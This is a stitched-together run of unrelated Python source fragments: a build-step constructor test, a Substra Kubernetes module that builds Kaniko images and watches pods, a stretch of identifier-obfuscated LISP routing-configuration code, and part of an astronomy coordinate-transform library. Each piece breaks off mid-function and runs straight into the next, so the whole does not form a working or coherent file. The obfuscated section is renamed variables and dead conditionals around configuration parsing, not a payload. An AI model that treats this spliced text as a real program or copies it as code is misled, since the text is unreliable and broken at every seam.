BuildStepsConstructorTest.createTest(builderName, step)) @staticmethod def createTest(builderName, step): def doTest(self): try: buildStepFactory, kwargs = step buildStepFactory(**kwargs) except TypeError as e: buildStepName = str(buildStepFactory).split('.')[-1] self.fail("Error during instantiation
import kubernetes import requests import os import json import datetime import logging from django.conf import settings from substrapp.utils import timeit from substrapp.exceptions import PodErrorException, PodTimeoutException import time logger = logging.getLogger(__name__) MEDIA_ROOT = os.getenv('MEDIA_ROOT') REGISTRY = os.getenv('REGISTRY') REGISTRY_SCHEME = os.getenv('REGISTRY_SCHEME') REGISTRY_PULL_DOMAIN = os.getenv('REGISTRY_PULL_DOMAIN') NAMESPACE = os.getenv('NAMESPACE') NODE_NAME = os.getenv('NODE_NAME') COMPONENT = 'substra-compute' RUN_AS_GROUP = os.getenv('RUN_AS_GROUP') RUN_AS_USER = os.getenv('RUN_AS_USER') FS_GROUP = os.getenv('FS_GROUP') KANIKO_MIRROR = settings.TASK['KANIKO_MIRROR'] KANIKO_IMAGE = settings.TASK['KANIKO_IMAGE'] COMPUTE_REGISTRY = settings.TASK['COMPUTE_REGISTRY'] HTTP_CLIENT_TIMEOUT_SECONDS = getattr(settings, 'HTTP_CLIENT_TIMEOUT_SECONDS') REGISTRY_IS_LOCAL = settings.REGISTRY_IS_LOCAL REGISTRY_SERVICE_NAME = settings.REGISTRY_SERVICE_NAME K8S_PVC = { env_key: env_value for env_key, env_value in os.environ.items() if '_PVC' in env_key } class ImageNotFound(Exception): pass class BuildError(Exception): pass def k8s_get_cache_index_lock_file(cache_index): return f'/tmp/cache-index-{cache_index}.lock' def k8s_try_create_file(path): try: fd = os.open(path, os.O_CREAT | os.O_EXCL) os.close(fd) return True except FileExistsError: return False def k8s_acquire_cache_index(): celery_worker_concurrency = int(getattr(settings, 'CELERY_WORKER_CONCURRENCY')) if celery_worker_concurrency == 1: return None max_attempts = 12 attempt = 0 while attempt < max_attempts: for cache_index in range(1, celery_worker_concurrency + 1): lock_file = k8s_get_cache_index_lock_file(cache_index) if k8s_try_create_file(lock_file): return str(cache_index) attempt += 1 raise Exception(f'Could not acquire cache index after {max_attempts} attempts') def k8s_release_cache_index(cache_index): if cache_index is None: return lock_file = k8s_get_cache_index_lock_file(cache_index) try: os.remove(lock_file) except FileNotFoundError: pass def watch_pod(name, watch_init_container=False): kubernetes.config.load_incluster_config() k8s_client = kubernetes.client.CoreV1Api() finished = False attempt = 0 max_attempts = 5 + (5 if watch_init_container else 0) error = None watch_container = not watch_init_container logger.info(f'Waiting for pod {name}...') pod_status = None while (not finished) and (attempt < max_attempts): try: api_response = k8s_client.read_namespaced_pod_status( name=name, namespace=NAMESPACE, pretty=True ) if api_response.status.phase != pod_status: pod_status = api_response.status.phase logger.info(f'Status for pod "{name}" {api_response.status.phase} status') # Handle pod error not linked with containers if api_response.status.phase == 'Failed' or (api_response.status.reason and 'Evicted' in api_response.status.reason): if api_response.status.reason: error = api_response.status.reason else: error = f'Pod phase : {api_response.status.phase}' logger.error(f'Status for pod "{name}" {api_response.status.phase.lower()} status') finished = True continue if watch_init_container: if api_response.status.init_container_statuses: for init_container in api_response.status.init_container_statuses: state = init_container.state if state.terminated: # TODO: support multiple init containers if state.terminated.exit_code != 0: finished = True error = 'InitContainer: ' + get_pod_error(state.terminated) else: watch_container = True # Init container is ready else: if state.waiting and state.waiting.reason not in ['PodInitializing', 'ContainerCreating']: error = 'InitContainer: ' + get_pod_error(state.waiting) attempt += 1 logger.error(f'InitContainer for pod "{name}" waiting status ' f'(attempt {attempt}/{max_attempts}): {state.waiting.message}') if watch_container: if api_response.status.container_statuses: for container in api_response.status.container_statuses: state = container.state if state.terminated: finished = True error = None if state.terminated.exit_code != 0: error = get_pod_error(state.terminated) else: # {"ContainerCreating", "CrashLoopBackOff", "CreateContainerConfigError", # "ErrImagePull", "ImagePullBackOff", "CreateContainerError", "InvalidImageName"} if state.waiting and state.waiting.reason not in ['PodInitializing', 'ContainerCreating']: error = get_pod_error(state.waiting) attempt += 1 logger.error(f'Container for pod "{name}" waiting status ' f'(attempt {attempt}/{max_attempts}): {state.waiting.message}') if not finished: time.sleep(0.2) except Exception as e: attempt += 1 logger.error(f'Could not get pod "{name}" status (attempt {attempt}/{max_attempts}): {e}') if error is not None: raise PodErrorException(f'Pod {name} terminated with error: {error}') if not finished: raise PodTimeoutException(f'Pod {name} didn\'t complete after {max_attempts} attempts') def get_pod_error(state): error = state.reason if state.message is not None: error += f' ({state.message})' return error def get_pod_name(name): kubernetes.config.load_incluster_config() k8s_client = kubernetes.client.CoreV1Api() api_response = k8s_client.list_namespaced_pod( NAMESPACE, label_selector=f'app={name}' ) if api_response.items: pod = api_response.items.pop() else: raise Exception(f'Could not get pod name {name}') return pod.metadata.name def pod_exists(name): kubernetes.config.load_incluster_config() k8s_client = kubernetes.client.CoreV1Api() try: k8s_client.read_namespaced_pod( name=name, namespace=NAMESPACE) except Exception: return False else: return True def wait_for_pod_deletion(name): while pod_exists(name): pass @timeit def get_pod_logs(name, container): kubernetes.config.load_incluster_config() k8s_client = kubernetes.client.CoreV1Api() logs = f'No logs for pod {name}' if pod_exists(name): try: logs = k8s_client.read_namespaced_pod_log( name=name, namespace=NAMESPACE, container=container ) except Exception: pass return logs def container_format_log(container_name, container_logs): if isinstance(container_logs, bytes): logs = [f'[{container_name}] {log}' for log in container_logs.decode().split('\n')] else: logs = [f'[{container_name}] {log}' for log in container_logs.split('\n')] for log in logs: logger.info(log) @timeit def k8s_build_image(path, tag, rm): try: cache_index = k8s_acquire_cache_index() _k8s_build_image(path, tag, rm, cache_index) except Exception: raise finally: k8s_release_cache_index(cache_index) def _k8s_build_image(path, tag, rm, cache_index): kubernetes.config.load_incluster_config() k8s_client = kubernetes.client.CoreV1Api() job_name = f'kaniko-{tag.split("/")[-1].replace("_", "-")}' dockerfile_fullpath = os.path.join(path, 'Dockerfile') dockerfile_mount_subpath = path.split('/subtuple/')[-1] # kaniko build can be launched without privilege but # it needs some capabilities and to be root image = KANIKO_IMAGE command = None mount_path_dockerfile = path mount_path_cache = '/cache' args = [ f'--dockerfile={dockerfile_fullpath}', f'--context=dir://{path}', f'--destination={REGISTRY}/substrafoundation/user-image:{tag}', '--cache=true', '--log-timestamp=true', '--verbosity=debug', '--snapshotMode=redo', '--push-retry=3', '--cache-copy-layers', '--single-snapshot' ] if REGISTRY_SCHEME == 'http': args.append('--insecure') if KANIKO_MIRROR: args.append(f'--registry-mirror={REGISTRY}') if REGISTRY_SCHEME == 'http': args.append('--insecure-pull') # https://github.com/GoogleContainerTools/kaniko/issues/778 capabilities = ['CHOWN', 'SETUID', 'SETGID', 'FOWNER', 'DAC_OVERRIDE'] pod_security_context = get_pod_security_context(root=True) container_security_context = get_security_context(root=True, add_capabilities=capabilities) container = kubernetes.client.V1Container( name=job_name, image=image if not COMPUTE_REGISTRY else f'{COMPUTE_REGISTRY}/{image}', command=command, args=args, volume_mounts=[ {'name': 'dockerfile', 'mountPath': mount_path_dockerfile, 'subPath': dockerfile_mount_subpath, 'readOnly': True} ], security_context=container_security_context ) if mount_path_cache is not None: container.volume_mounts.append({ 'name': 'cache', 'mountPath': mount_path_cache, 'subPath': cache_index, 'readOnly': True }) pod_affinity = kubernetes.client.V1Affinity( pod_affinity=kubernetes.client.V1PodAffinity( required_during_scheduling_ignored_during_execution=[ kubernetes.client.V1PodAffinityTerm( label_selector=kubernetes.client.V1LabelSelector( match_expressions=[ kubernetes.client.V1LabelSelectorRequirement( key="app.kubernetes.io/component", operator="In", values=["substra-worker"] ) ] ), topology_key="kubernetes.io/hostname" ) ] ) ) spec = kubernetes.client.V1PodSpec( restart_policy='Never', affinity=pod_affinity, containers=[container], volumes=[ { 'name': 'dockerfile', 'persistentVolumeClaim': {'claimName': K8S_PVC['SUBTUPLE_PVC']} } ], security_context=pod_security_context ) if mount_path_cache is not None: spec.volumes.append({ 'name': 'cache', 'persistentVolumeClaim': {'claimName': K8S_PVC['DOCKER_CACHE_PVC']} }) pod = kubernetes.client.V1Pod( api_version='v1', kind='Pod', metadata=kubernetes.client.V1ObjectMeta( name=job_name, labels={'app': job_name, 'task': 'build', 'app.kubernetes.io/component': COMPONENT} ), spec=spec ) create_pod = not pod_exists(job_name) if create_pod: try: logger.info(f'Creating pod {NAMESPACE}/{job_name}') k8s_client.create_namespaced_pod(body=pod, namespace=NAMESPACE) except kubernetes.client.rest.ApiException as e: raise Exception(f'Error creating pod {NAMESPACE}/{job_name}. Reason: {e.reason}, status: {e.status}, ' f'body: {e.body}') from None try: watch_pod(job_name) except Exception as e: # In case of concurrent build, it may fail # check if image exists if not k8s_image_exists(tag): logger.error(f'Kaniko build failed, error: {e}') raise BuildError(f'Kaniko build failed, error: {e}') finally: if create_pod: container_format_log( job_name, get_pod_logs(name=get_pod_name(job_name), container=job_name) ) k8s_client.delete_namespaced_pod( name=job_name, namespace=NAMESPACE, body=kubernetes.client.V1DeleteOptions( propagation_policy='Foreground', grace_period_seconds=0 ) ) @timeit def k8s_get_image(image_name): response = requests.get( f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{image_name}', headers={'Accept': 'application/json'}, timeout=HTTP_CLIENT_TIMEOUT_SECONDS ) if response.status_code != requests.status_codes.codes.ok: raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}') return response.json() def k8s_image_exists(image_name): try: k8s_get_image(image_name) except ImageNotFound: return False else: return True def k8s_remove_image(image_name): logger.info(f'Deleting image {image_name}') try: response = requests.get( f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{image_name}', headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}, timeout=HTTP_CLIENT_TIMEOUT_SECONDS ) if response.status_code != requests.status_codes.codes.ok: # raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}') return digest = response.headers['Docker-Content-Digest'] response = requests.delete( f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{digest}', headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}, timeout=HTTP_CLIENT_TIMEOUT_SECONDS ) if response.status_code != requests.status_codes.codes.accepted: # raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}') return except Exception as e: logger.exception(e) def get_image_list_from_docker_registry(): response = requests.get( f'{REGISTRY_SCHEME}://{REGISTRY}/v2/_catalog', headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}, timeout=HTTP_CLIENT_TIMEOUT_SECONDS ) response.raise_for_status() res = response.json() for repository in res['repositories']: # get only user-image repo, images built by substra-backend if repository == 'user-image': response = requests.get( f'{REGISTRY_SCHEME}://{REGISTRY}/v2/{repository}/tags/list', headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}, timeout=HTTP_CLIENT_TIMEOUT_SECONDS ) response.raise_for_status() return response.json() return None def fetch_old_algo_image_names_from_docker_registry(max_duration): logger.info(f'Fetch image names older than {max_duration}s') images = get_image_list_from_docker_registry() old_images = [] if images: for image in images['tags']: response = requests.get( f'{REGISTRY_SCHEME}://{REGISTRY}/v2/user-image/manifests/{image}', timeout=HTTP_CLIENT_TIMEOUT_SECONDS ) response.raise_for_status() # take the most recent date as creation date created_date = max([ datetime.datetime.strptime(json.loads(e['v1Compatibility'])['created'].split('.')[0], '%Y-%m-%dT%H:%M:%S') for e in response.json()['history'] ]) if (datetime.datetime.now() - created_date).total_seconds() >= max_duration: old_images.append(image["name"]) return old_images def k8s_docker_registry_garbage_collector(): logger.info('Launch garbage collect on docker-registry') kubernetes.config.load_incluster_config() k8s_client = kubernetes.client.CoreV1Api() pod_name = get_pod_name('docker-registry') exec_command = [ '/bin/sh', '-c', '/bin/registry garbage-collect /etc/docker/registry/config.yml 2>&1' ] resp = kubernetes.stream.stream( k8s_client.connect_get_namespaced_pod_exec, pod_name, NAMESPACE, command=exec_command, stderr=True, stdin=True, stdout=True, tty=True, _preload_content=False, ) logs = [] while resp.is_open(): resp.update(timeout=1) if resp.peek_stdout(): lines = resp.read_stdout() for line in filter(None, lines.split("\n")): logs.append(line) else: logger.info(logs[-1]) returncode = resp.returncode resp.close() if returncode != 0: raise Exception( f"Error running docker-registry garbage collector (exited with code {returncode})" ) @timeit def k8s_compute(image_name, job_name, command, volumes, task_label, capture_logs, environment, remove_image, subtuple_key, compute_plan_key): pull_domain = REGISTRY_PULL_DOMAIN if REGISTRY_IS_LOCAL: try: registry_port = get_docker_registry_port() except Exception as e: raise Exception("Failed to retrieve docker registry node port") from e pull_domain += f":{registry_port}" # We cannot currently set up shm_size # Suggestion https://github.com/timescale/timescaledb-kubernetes/pull/131/files # 'shm_size': '8G' task_args = { 'image': f'{pull_domain}/substrafoundation/user-image:{image_name}', 'name': job_name, 'command': command, 'volumes': volumes, 'label': task_label, 'environment': environment } try: _k8s_compute(job_name, task_args, subtuple_key) except (PodErrorException, PodTimeoutException) as e: logger.error(e) raise except Exception as e: logger.exception(e) raise finally: if capture_logs: container_format_log( job_name, get_pod_logs(name=get_pod_name(job_name), container=job_name) ) delete_compute_pod(job_name) # Remove images if remove_image: k8s_remove_image(image_name) def generate_volumes(volume_binds, name, subtuple_key): volume_mounts = [] volumes = [] for path, bind in volume_binds.items(): if '/servermedias/' in path: # /MOUNT/PATH/servermedias/... volume_name = 'servermedias' else: # /MOUNT/PATH/medias/volume_name/... volume_name = path.split('/medias/')[-1].split('/')[0] subpath = path.split(f'/{volume_name}/')[-1] pvc_name = [key for key in K8S_PVC.keys() if volume_name in key.lower()] if pvc_name: pvc_name = pvc_name.pop() else: raise Exception(f'PVC for {volume_name} not found') volume_mounts.append({ 'name': volume_name, 'mountPath': bind['bind'], 'subPath': subpath, 'readOnly': bind['mode'] != 'rw' }) volumes.append({ 'name': volume_name, 'persistentVolumeClaim': {'claimName': K8S_PVC[pvc_name]} }) # Unique volumes volumes = list({v['name']: v for v in volumes}.values()) return volume_mounts, volumes @timeit def _k8s_compute(name,
90 - 90: OoO0O00 / Ii1I % iIii1I11I1II1 / O0 * oO0o / I1IiiI if 83 - 83: II111iiii . ooOoO0o / oO0o if 54 - 54: ooOoO0o - iIii1I11I1II1 - I11i % Ii1I / II111iiii if 80 - 80: i11iIiiIii % iIii1I11I1II1 / i11iIiiIii lisp . lisp_geo_list [ OooOO0o0oOoO ] = i11I1Ii1Iiii1 return if 66 - 66: OoOoOO00 . iIii1I11I1II1 * I1ii11iIi11i - Ii1I - iIii1I11I1II1 if 28 - 28: OoOoOO00 % OoooooooOO if 13 - 13: IiII . Oo0Ooo - I11i / oO0o - Oo0Ooo - I1IiiI if 84 - 84: II111iiii if 57 - 57: O0 * iIii1I11I1II1 % O0 . OoooooooOO if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo if 16 - 16: OoO0O00 % I1Ii111 . i1IIi / I1ii11iIi11i - O0 def lisp_elp_command ( kv_pair ) : if 85 - 85: i1IIi . i1IIi O0oO0 = None Ii11i1I1 = [ ] if ( "address" in kv_pair ) : for i1iIIiiIiII in range ( len ( kv_pair [ "address" ] ) ) : OOI1 = lisp . lisp_elp_node ( ) Ii11i1I1 . append ( OOI1 ) if 59 - 59: OoooooooOO * o0oOOo0O0Ooo / I1Ii111 if 75 - 75: o0oOOo0O0Ooo - OoooooooOO if 21 - 21: I1IiiI + iIii1I11I1II1 / i11iIiiIii / oO0o for IiII1II11I in list ( kv_pair . keys ( ) ) : oo00oO0O0 = kv_pair [ IiII1II11I ] if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi if ( IiII1II11I == "elp-name" ) : O0oO0 = lisp . lisp_elp ( oo00oO0O0 ) continue if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII if 26 - 26: i1IIi / I1IiiI / I11i + I11i for i1II111iiii in Ii11i1I1 : O0OO0O = Ii11i1I1 . index ( i1II111iiii ) if ( O0OO0O >= len ( oo00oO0O0 ) ) : O0OO0O = len ( oo00oO0O0 ) - 1 oOOo0oO = oo00oO0O0 [ O0OO0O ] if ( IiII1II11I == "probe" ) : i1II111iiii . probe = ( oOOo0oO == "yes" ) if ( IiII1II11I == "strict" ) : i1II111iiii . strict = ( oOOo0oO == "yes" ) if ( IiII1II11I == "eid" ) : i1II111iiii . eid = ( oOOo0oO == "yes" ) if ( IiII1II11I == "address" ) : i1II111iiii . address . store_address ( oOOo0oO ) if 6 - 6: II111iiii if 1 - 1: ooOoO0o % Oo0Ooo . oO0o if 98 - 98: II111iiii + II111iiii - iIii1I11I1II1 . OoOoOO00 . I1Ii111 if 99 - 99: oO0o . Ii1I * I1Ii111 * iIii1I11I1II1 / OoOoOO00 % IiII if 70 - 70: I1ii11iIi11i . O0 if 70 - 70: Oo0Ooo + i11iIiiIii if ( O0oO0 == None ) : return if 44 - 44: i11iIiiIii / OOooOOo * ooOoO0o if 88 - 88: i1IIi % OOooOOo / OoooooooOO * iII111i % ooOoO0o if 5 - 5: I1ii11iIi11i * Ii1I % I11i % II111iiii if 9 - 9: o0oOOo0O0Ooo % I1Ii111 + I11i O0oO0 . elp_nodes = Ii11i1I1 lisp . lisp_elp_list [ O0oO0 . elp_name ] = O0oO0 return if 55 - 55: OoO0O00 - I1ii11iIi11i if 38 - 38: iIii1I11I1II1 % IiII % OoO0O00 % O0 * iIii1I11I1II1 / I1Ii111 if 65 - 65: OOooOOo - I1IiiI * I1Ii111 if 99 - 99: I1IiiI if 64 - 64: I1ii11iIi11i * Ii1I * Oo0Ooo % IiII % ooOoO0o if 55 - 55: II111iiii - I1Ii111 - OOooOOo % Ii1I if 49 - 49: Oo0Ooo * I1Ii111 def lisp_rle_command ( kv_pair ) : if 53 - 53: Oo0Ooo / Ii1I + oO0o . iII111i + IiII o0OOO = None iIiii1iI1Ii = [ ] if ( "address" in kv_pair ) : for i1iIIiiIiII in range ( len ( kv_pair [ "address" ] ) ) : ooIi = lisp . lisp_rle_node ( ) iIiii1iI1Ii . append ( ooIi ) if 96 - 96: OoO0O00 + I1IiiI % Oo0Ooo if 21 - 21: OoOoOO00 - i11iIiiIii - OoOoOO00 if 4 - 4: I11i . IiII for IiII1II11I in list ( kv_pair . keys ( ) ) : oo00oO0O0 = kv_pair [ IiII1II11I ] if 39 - 39: OOooOOo . Oo0Ooo - OoOoOO00 * i11iIiiIii if ( IiII1II11I == "rle-name" ) : o0OOO = lisp . lisp_rle ( oo00oO0O0 ) continue if 4 - 4: OoOoOO00 * O0 - I11i if 72 - 72: I11i + ooOoO0o / I1IiiI . IiII % OoO0O00 / i11iIiiIii for i1II111iiii in iIiii1iI1Ii : O0OO0O = iIiii1iI1Ii . index ( i1II111iiii ) if ( O0OO0O >= len ( oo00oO0O0 ) ) : O0OO0O = len ( oo00oO0O0 ) - 1 oOOo0oO = oo00oO0O0 [ O0OO0O ] if ( IiII1II11I == "level" ) : if ( oOOo0oO == "" ) : oOOo0oO = "0" i1II111iiii . level = int ( oOOo0oO ) if 13 - 13: I1Ii111 % o0oOOo0O0Ooo + OOooOOo + I1Ii111 + i11iIiiIii - I1ii11iIi11i if ( IiII1II11I == "address" ) : i1II111iiii . address . store_address ( oOOo0oO ) if 70 - 70: II111iiii * II111iiii . I1IiiI if 11 - 11: iII111i if 20 - 20: Ii1I . I1Ii111 % Ii1I if 5 - 5: OOooOOo + iII111i if 23 - 23: I1Ii111 % iIii1I11I1II1 . I11i if 95 - 95: Oo0Ooo + i11iIiiIii % OOooOOo - oO0o if ( o0OOO == None ) : return if 11 - 11: I1ii11iIi11i / O0 + II111iiii if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1 if 17 - 17: OoO0O00 - Oo0Ooo * O0 / Ii1I if 19 - 19: i1IIi - iIii1I11I1II1 . I11i o0OOO . rle_nodes = iIiii1iI1Ii o0OOO . build_forwarding_list ( ) lisp . lisp_rle_list [ o0OOO . rle_name ] = o0OOO return if 2 - 2: Ii1I if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo if 81 - 81: iIii1I11I1II1 if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0 if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii def lisp_json_command ( kv_pair ) : if 7 - 7: IiII try : oOOOo0Oooo = kv_pair [ "json-name" ] I1iiIIiI11I = kv_pair [ "json-string" ] except : return if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo if 33 - 33: o0oOOo0O0Ooo * Oo0Ooo oOO00O0Ooooo00 = lisp . lisp_json ( oOOOo0Oooo , I1iiIIiI11I ) oOO00O0Ooooo00 . add ( ) return if 88 - 88: I1Ii111 % OOooOOo - OoOoOO00 - OoOoOO00 . I1IiiI if 52 - 52: II111iiii / II111iiii / I1IiiI - I1Ii111 if 91 - 91: I1IiiI + o0oOOo0O0Ooo % II111iiii + OoO0O00 if 66 - 66: iIii1I11I1II1 * II111iiii % Oo0Ooo % I1IiiI - Ii1I if 59 - 59: IiII % oO0o if 21 - 21: OoooooooOO % OoOoOO00 - OoOoOO00 / I1ii11iIi11i / o0oOOo0O0Ooo if 15 - 15: ooOoO0o / ooOoO0o % OoooooooOO . I1Ii111 if 93 - 93: I1ii11iIi11i * I1ii11iIi11i / OoooooooOO if 6 - 6: I1ii11iIi11i * Oo0Ooo + iIii1I11I1II1 if 19 - 19: O0 % II111iiii * o0oOOo0O0Ooo if 27 - 27: OOooOOo * IiII / i11iIiiIii - oO0o + II111iiii if 43 - 43: I1ii11iIi11i - II111iiii def lisp_get_lookup_string ( input_str ) : if 56 - 56: I1ii11iIi11i . i1IIi / iII111i % oO0o / O0 * I11i if 98 - 98: O0 + iII111i if 23 - 23: OoooooooOO . iIii1I11I1II1 / i1IIi if 31 - 31: Oo0Ooo - iIii1I11I1II1 / I11i . OoO0O00 OOOO0oo0 = input_str I11iiI1i1 = None if ( input_str . find ( "->" ) != - 1 ) : I1i1Iiiii = input_str . split ( "->" ) OOOO0oo0 = I1i1Iiiii [ 0 ] I11iiI1i1 = I1i1Iiiii [ 1 ] if 74 -
<gh_stars>10-100 from __future__ import print_function import numpy as np from . import utils import astropy.coordinates as c, astropy.units as u # Optional dependencies are imported in the functions that # use them. These include enlib.ephem, enlib.iers and enlib.pyfsla # Python 2/3 compatibility try: basestring except NameError: basestring = str class default_site: lat = -22.9585 lon = -67.7876 alt = 5188. T = 273.15 P = 550. hum = 0.2 freq = 150. lapse= 0.0065 base_tilt = 0.0107693 base_az = -114.9733961 def transform(from_sys, to_sys, coords, time=55500, site=default_site, pol=None, mag=None, bore=None): """Transforms coords[2,...] from system from_sys to system to_sys, where systems can be "hor", "cel" or "gal". For transformations involving "hor", the optional arguments time (in modified julian days) and site (which must contain .lat (rad), .lon (rad), .P (pressure, mBar), .T (temperature, K), .hum (humidity, 0.2 by default), .alt (altitude, m)). Returns an array with the same shape as the input. The coordinates are in ra,dec-ordering.""" from_info, to_info = getsys_full(from_sys,time,site,bore=bore), getsys_full(to_sys,time,site,bore=bore) ihand = get_handedness(from_info[0]) ohand = get_handedness(to_info[0]) # Apply the specified transformation, optionally computing the induced # polarization rotation and apparent magnification def transfunc(coords): return transform_raw(from_info, to_info, coords, time=time, site=site, bore=bore) fields = [] if pol: fields.append("ang") if mag: fields.append("mag") if pol is None and mag is None: if len(coords) > 2: fields.append("ang") if len(coords) > 3: fields.append("mag") meta = transform_meta(transfunc, coords[:2], fields=fields) # Fix the polarization convention. We use healpix if "ang" in fields: if ihand != ohand: meta.ang -= np.pi if ohand != 'L': meta.ang = -meta.ang # Create the output array. This is a bit cumbersome because # each of the output columns can be either ang or mag, which # might or might not have previous values that need to be # updated. It is this way to keep backward compatibility. res = np.zeros((2+len(fields),) + meta.ocoord.shape[1:]) res[:2] = meta.ocoord off = 2 for i, f in enumerate(fields): if f == "ang": if len(coords) > 2: res[off+i] = coords[2] + meta.ang else: res[off+i] = meta.ang elif f == "mag": if len(coords) > 3: res[off+i] = coords[3] * meta.mag else: res[off+i] = meta.mag return res def transform_meta(transfun, coords, fields=["ang","mag"], offset=5e-7): """Computes metadata for the coordinate transformation functor transfun applied to the coordinate array coords[2,...], such as the induced rotation, magnification. Currently assumes that input and output coordinates are in non-zenith polar coordinates. Might generalize this later. """ if "mag_brute" in fields: ntrans = 3 elif "ang" in fields: ntrans = 2 else: ntrans = 1 coords = np.asarray(coords) offsets = np.array([[0,0],[1,0],[0,1]])*offset # Transform all the coordinates. We assume we aren't super-close to the poles # either before or after the transformation. ocoords = np.zeros((ntrans,2)+coords.shape[1:]) ocoords = None for i in range(ntrans): # Transpose to get broadcasting right a = transfun((coords.T + offsets[i].T).T) if ocoords is None: ocoords = np.zeros((ntrans,)+a.shape, a.dtype) ocoords[i] = a class Result: pass res = Result() res.icoord = coords res.ocoord = ocoords[0] # Compute the individual properties we're interested in diff = utils.rewind(ocoords[1:]-ocoords[0,None]) if "ang" in fields: # We only need the theta offset of this one. We started with # an offset in the [1,0] direction, and want to know how # far we have rotated away from this direction. This # Uses the IAU tangent plane angle convention: # http://healpix.jpl.nasa.gov/html/intronode12.htm # and assumes that both input and putput coordinates have the # same handedness. This is not always the case, for example # with horizontal to celestial coordinate transformations. # In these cases, the caller must correct there resulting angle # manually. phiscale = np.cos(ocoords[0,1]) res.ang = np.arctan2(diff[0,1],diff[0,0]*phiscale) if "mag" in fields: res.mag = np.cos(res.icoord[1])/np.cos(res.ocoord[1]) if "mag_brute" in fields: # Compute the ratio of the areas of the triangles # made up by the three point-sets in the input and # output coordinates. This ratio is always 1 when # using physical areas, so we instead compute the # apparent areas here. def tri_area(diff): return 0.5*np.abs(diff[0,0]*diff[1,1]-diff[0,1]*diff[1,0]) res.mag = (tri_area(diff).T/tri_area(offsets[1:]-offsets[0]).T).T return res def transform_raw(from_sys, to_sys, coords, time=None, site=default_site, bore=None): """Transforms coords[2,...] from system from_sys to system to_sys, where systems can be "hor", "cel" or "gal". For transformations involving "hor", the optional arguments time (in modified julian days) and site (which must contain .lat (rad), .lon (rad), .P (pressure, mBar), .T (temperature, K), .hum (humidity, 0.2 by default), .alt (altitude, m)). Returns an array with the same shape as the input. The coordinates are in ra,dec-ordering. coords and time will be broadcast such that the result has the same shape as coords*time[None].""" # Prepare input and output arrays if time is None: coords = np.array(coords)[:2] else: time = np.asarray(time) coords = np.asarray(coords) # Broadasting. A bit complicated because we want to handle # both time needing to broadcast and coords needing to time = time + np.zeros(coords[0].shape,time.dtype) coords = (coords.T + np.zeros(time.shape,coords.dtype)[None].T).T # flatten, so the rest of the code can assume that coordinates are [2,N] # and time is [N] oshape = coords.shape coords= np.ascontiguousarray(coords.reshape(2,-1)) if time is not None: time = time.reshape(-1) # Perform the actual coordinate transformation. There are three classes of # transformations here: # 1. To/from object-centered coordinates # 2. cel-hor transformation, using slalib # 3. cel-gal transformation, using astropy (from_sys,from_ref), (to_sys,to_ref) = getsys_full(from_sys,time,site,bore=bore), getsys_full(to_sys,time,site,bore=bore) if from_ref is not None: coords[:] = decenter(coords, from_ref[0], restore=from_ref[1]) while True: if from_sys == to_sys: break elif from_sys == "bore": coords[:] = bore2tele(coords, bore) from_sys = "tele" elif from_sys == "tele" and to_sys in ["bore"]: coords[:] = tele2bore(coords, bore) from_sys = "bore" elif from_sys == "tele": coords[:] = tele2hor(coords, site, copy=False) from_sys = "altaz" elif from_sys == "altaz" and to_sys in ["tele","bore"]: coords[:] = hor2tele(coords, site, copy=False) from_sys = "tele" elif from_sys == "altaz": coords[:] = hor2cel(coords, time, site, copy=False) from_sys = "icrs" elif from_sys == "icrs" and to_sys in ["altaz","tele","bore"]: coords[:] = cel2hor(coords, time, site, copy=False) from_sys = "altaz" else: to_sys_astropy = nohor(to_sys) coords[:] = transform_astropy(from_sys, to_sys_astropy, coords) from_sys = to_sys_astropy if to_ref is not None: coords[:] = recenter(coords, to_ref[0], restore=to_ref[1]) return coords.reshape(oshape) def transform_astropy(from_sys, to_sys, coords): """As transform, but only handles the systems supported by astropy.""" from_sys, to_sys = getsys(from_sys), getsys(to_sys) if from_sys == to_sys: return coords unit = u.radian coords = c.SkyCoord(coords[0], coords[1], frame=from_sys, unit=unit) coords = coords.transform_to(to_sys) names = coord_names[to_sys] return np.asarray([ getattr(getattr(coords, names[0]),unit.name), getattr(getattr(coords, names[1]),unit.name)]) def transform_euler(euler, coords, pol=None, mag=None): """Like transform, but for a set of zyz euler angles instead""" def rotfun(coords): return euler_rot(euler, coords) fields = [] if pol: fields.append("ang") if mag: fields.append("mag") if pol is None and mag is None: if len(coords) > 2: fields.append("ang") if len(coords) > 3: fields.append("mag") meta = transform_meta(rotfun, coords[:2], fields=fields) res = np.zeros((2+len(fields),) + meta.ocoord.shape[1:]) res[:2] = meta.ocoord off = 2 for i, f in enumerate(fields): if f == "ang": if len(coords) > 2: res[off+i] = coords[2] + meta.ang else: res[off+i] = meta.ang elif f == "mag": if len(coords) > 3: res[off+i] = coords[3] * meta.mag else: res[off+i] = meta.mag return res def hor2cel(coord, time, site, copy=True): from enlib.coordinates import pyfsla from enlib.coordinates import iers coord = np.array(coord, copy=copy) trepr = time[len(time)/2] info = iers.lookup(trepr) ao = pyfsla.sla_aoppa(trepr, info.dUT, site.lon*utils.degree, site.lat*utils.degree, site.alt, info.pmx*utils.arcsec, info.pmy*utils.arcsec, site.T, site.P, site.hum, 299792.458/site.freq, site.lapse) am = pyfsla.sla_mappa(2000.0, trepr) # This involves a transpose operation, which is not optimal pyfsla.aomulti(time, coord.T, ao, am) return coord def 